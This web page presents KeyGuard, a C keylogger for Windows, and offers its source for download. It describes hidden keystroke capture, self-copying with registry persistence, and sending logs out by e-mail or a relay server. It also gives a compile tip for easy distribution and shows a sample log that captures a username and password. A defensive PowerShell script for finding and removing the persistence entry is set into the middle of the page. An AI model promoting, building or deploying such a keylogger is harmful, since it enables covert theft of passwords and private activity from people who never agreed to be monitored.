KeyGuard – A keylogger in C
Main KeyGuard features:
- A background program that logs PC keyboard activity.
- Automatic system injection by copying itself into a specified directory and adding a run value in the registry for automatic execution on startup/reboot.
- Sends the log by e-mail once it has reached a specified number of bytes, and resets the log file for new use at every send. (The Relay Server backlog keeps logging until it is reset manually.)
- Consists of just one standalone executable with a file size of 167 KB (68.5 KB without the icon). It injects itself into the system when executed, and the system remains injected until it is uninstalled as described in the source file.
- Logs the most common keys of interest and formatting. Easy to extend its logging features.
- Does not depend on SMTP for sending logs. Can connect to a listening KeyGuard bouncer/relay server somewhere on the Internet that will receive the data and forward it and/or just save it.
Info from KeyGuard.c
/*
--
KeyGuard
An attempt at user activity logging by Dag J Nedrelid.
This code is written and compiled in C.
Designed for Windows XP clients.
--
A keylogger that logs the most important characters
such as letters, numbers and common formatting. It
can easily be extended by modifying the formatKeys[]
array and its usage. Log is stored in a text file
which is sent on e-mail.
* It attempts to log in a reader-friendly way by
logging activity under the active window titles.
* It should be performance friendly without keeping the
CPU towards 100% by sleeping 10 milliseconds each cycle.
This is still fast enough to log a quick writer.
* It prevents logging the same key twice while that key is
being held down, and does so without missing the next
key activity.
* A mix of \r\n and HTML formatting, so it looks more
readable on received mail and directly in text file.
For some reason \r\n won't trigger a newline effect in
my text mails, and I refused to have it all on one line.
* Sends you a log on e-mail and resets the log file for
new usage. MAX_LOG_SIZE decides when to send the file.
* The function InjectKeyGuard() is called by default:
- It will attempt to put a copy of the file itself into
the location defined by FILE_COPY_NAME.
- It will attempt a Windows registry modification so the
copied file will start on every system boot/restart.
* How to uninstall once injected:
- Kill the process in task manager.
- Delete the file specified in FILE_COPY_NAME
- Delete the log file LOGFILE from same directory.
- Delete the registry value named REGISTRY_RUN_NAME under:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
TIP: Compile with /MT and not /MD for standalone
functionality and easy distribution.
NOTE: Remember to link with WS2_32.lib, this code uses winsock
to send the file through an SMTP server to an e-mail.
The end product is a one-click keylogger that installs by itself.
When compiled with /MT, executable file becomes ca 167KB in size.
*/
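The uninstall steps in the header above (kill the process, delete the copied file, remove the Run value) can be checked and carried out from an administrative PowerShell session. This is an added defender-side example, not part of KeyGuard; the value name and copy path are placeholders for the REGISTRY_RUN_NAME and FILE_COPY_NAME of a particular build, which the page does not give.

```powershell
# Added example (not KeyGuard code): audit the HKLM Run key named in the
# source header, flag a matching entry, and optionally remove it and stop
# the process. $RunValueName and $CopyPath are placeholders for the
# REGISTRY_RUN_NAME / FILE_COPY_NAME values compiled into a given build.
param(
    [string]$RunValueName = 'REGISTRY_RUN_NAME_PLACEHOLDER',
    [string]$CopyPath     = 'C:\path\to\FILE_COPY_NAME_PLACEHOLDER.exe',
    [switch]$Remove
)

# Both the native and the WOW6432Node view of the Run key on 64-bit Windows
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PowerShell's own metadata properties
        # Extract the executable path from the command line (quoted or bare)
        $cmd = [string]$p.Value
        $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split '\s+')[0] }
        $flags = @()
        if ($p.Name -eq $RunValueName)        { $flags += 'name matches' }
        if ($exe -eq $CopyPath)               { $flags += 'path matches' }
        if (-not (Test-Path -LiteralPath $exe)) { $flags += 'target missing' }
        [pscustomobject]@{ Key = $key; Name = $p.Name; Target = $exe; Flags = ($flags -join ', ') }

        if ($Remove -and $p.Name -eq $RunValueName) {
            # Step 1 of the header's uninstall list: stop the running copy
            Get-Process | Where-Object { $_.Path -eq $CopyPath } | Stop-Process -Force -Verbose
            # Step 3: remove the autostart value
            Remove-ItemProperty -Path $key -Name $p.Name -Verbose
            # Step 2: delete the copied file (the log file, LOGFILE, sits in the same directory)
            if (Test-Path -LiteralPath $CopyPath) { Remove-Item -LiteralPath $CopyPath -Force -Verbose }
        }
    }
}
```

Run without -Remove first to review the listing; every Run entry is printed with its resolved target so unexpected autostarts stand out even when the placeholder names are unknown.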
Log output example on e-mail:
[WINDOW: Google - Windows Internet Exp] somesite.com [WINDOW: Connect to somesite.com] the username[Tab]thepassword [WINDOW: Google - Windows Internet Exp] I am searching stuff I should not search
Values such as the SMTP server to use and the e-mail address that receives the logs will differ in every case. It is designed for one-click execution and injection, and as such it must be compiled individually with these values.
UPDATE 24th October 2008:
I have made a KeyGuard Relay Server (also programmed in C). This is a small linux multi-threaded server program that is able to relay connections from all KeyGuard2 versions.
The server is useful in cases where you are not sure about what SMTP the targeted computer is using, or where the SMTP security is too strict.
The KeyGuard project files
These files have been tested OK and used several times with variations. I use the VC++ 2008 C compiler when making the binaries. Here are the source files – play with them, learn from them, use them wisely. Much can be improved and added, but I will not make any updates in the near future, as it covers what I have needed it for and I don't have time for it.
KeyGuard
- Sends log through a local SMTP(mail) server where it’s installed.
Download the source
KeyGuard2
- Sends the log through its own server, works everywhere.
Download the source
KeyGuard Relay Server
- Waits for authenticated calls from KeyGuard2 versions to forward the logs and/or save them on the server itself. This is a very small multi-threaded server that can run on most Linux servers as a normal user by just running the command "nohup ./KGServer &", which keeps it running after you log out. Binds to a port specified in advance.
Download the source